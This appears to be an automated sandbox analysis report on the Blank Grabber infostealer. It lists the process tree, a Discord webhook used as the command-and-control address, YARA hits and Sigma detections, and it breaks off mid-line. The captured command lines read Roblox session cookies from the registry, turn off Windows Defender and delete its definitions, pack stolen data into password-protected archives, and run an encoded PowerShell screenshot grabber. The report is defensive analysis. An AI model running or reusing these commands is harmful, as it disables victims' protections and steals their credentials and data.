attrib.exe (PID: 5584 cmdline: attrib -r C:\Windows\System32\drivers\etc\hosts MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)

cmd.exe (PID: 7472 cmdline: C:\Windows\system32\cmd.exe /c "getmac" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

getmac.exe (PID: 6852 cmdline: getmac MD5: 7D4B72DFF5B8E98DD1351A401E402C33)

cmd.exe (PID: 7704 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7932 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tree.com (PID: 7892 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)

cmd.exe (PID: 7988 cmdline: C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

attrib.exe (PID: 7808 cmdline: attrib +r C:\Windows\System32\drivers\etc\hosts MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)

cmd.exe (PID: 5964 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7656 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 5980 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

cmd.exe (PID: 7572 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tree.com (PID: 3392 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)

cmd.exe (PID: 1708 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tree.com (PID: 5704 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)

cmd.exe (PID: 7856 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tree.com (PID: 7524 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)

cmd.exe (PID: 8180 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 1824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7148 cmdline: powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 7988 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7704 cmdline: powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 8140 cmdline: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe a -r -hp"Logger1@12345" "C:\Users\user\AppData\Local\Temp\bALb7.zip" *" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

rar.exe (PID: 2196 cmdline: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe a -r -hp"Logger1@12345" "C:\Users\user\AppData\Local\Temp\bALb7.zip" * MD5: 9C223575AE5B9544BC3D69AC6364F75E)

cmd.exe (PID: 8068 cmdline: C:\Windows\system32\cmd.exe /c "wmic os get Caption" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Conhost.exe (PID: 7888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

svchost.exe (PID: 3200 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

cleanup

Malware Configuration

Threatname: Blank Grabber

{"C2 url": "https://discord.com/api/webhooks/1267176433306829014/YhEVi7QXrkO9uMJodvR8Fp2e6uTZlqxB6sVXodhGTQI4MPsm1-wFNZP3qTm1buU6tOMG"}

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\_MEI73722\rarreg.key	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000002.00000003.2648275073.000001C879EBD000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
00000002.00000002.2653293501.000001C879EBD000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
00000002.00000003.2178007249.000001C879DFF000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
00000000.00000003.2152150044.0000015A08634000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
00000002.00000003.2643435154.000001C87B04B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
00000002.00000002.2652913011.000001C879C30000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
00000000.00000003.2152150044.0000015A08632000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
Process Memory Space: wsapx.exe PID: 7372	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
Process Memory Space: wsapx.exe PID: 7432	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
Process Memory Space: wsapx.exe PID: 7432	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: wsapx.exe PID: 7432	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Click to see the 6 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\wsapx.exe'", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\wsapx.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\wsapx.exe", ParentImage: C:\Users\user\Desktop\wsapx.exe, ParentProcessId: 7432, ParentProcessName: wsapx.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\wsapx.exe'", ProcessId: 7508, ProcessName: cmd.exe

Sigma detected: Powershell Defender Disable Scan Feature

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\wsapx.exe", ParentImage: C:\Users\user\Desktop\wsapx.exe, ParentProcessId: 7432, ParentProcessName: wsapx.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", ProcessId: 7516, ProcessName: cmd.exe

Sigma detected: Rar Usage with Password and Compression Level

Source: Process started

Author: @ROxPinTeddy: Data: Command: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe a -r -hp"Logger1@12345" "C:\Users\user\AppData\Local\Temp\bALb7.zip" *", CommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe a -r -hp"Logger1@12345" "C:\Users\user\AppData\Local\Temp\bALb7.zip" *", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\wsapx.exe", ParentImage: C:\Users\user\Desktop\wsapx.exe, ParentProcessId: 7432, ParentProcessName: wsapx.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe a -r -hp"Logger1@12345" "C:\Users\user\AppData\Local\Temp\bALb7.zip" *", ProcessId: 8140, ProcessName: cmd.exe

Sigma detected: Suspicious Encoded PowerShell Command Line

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM

Sigma detected: Suspicious PowerShell Encoded Command Patterns

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM

Sigma detected: Suspicious Startup Folder Persistence

Source: File created

Author: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\wsapx.exe, ProcessId: 7432, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ??.scr

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Source: Process started

Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uses4c50\uses4c50.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uses4c50\uses4c50.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 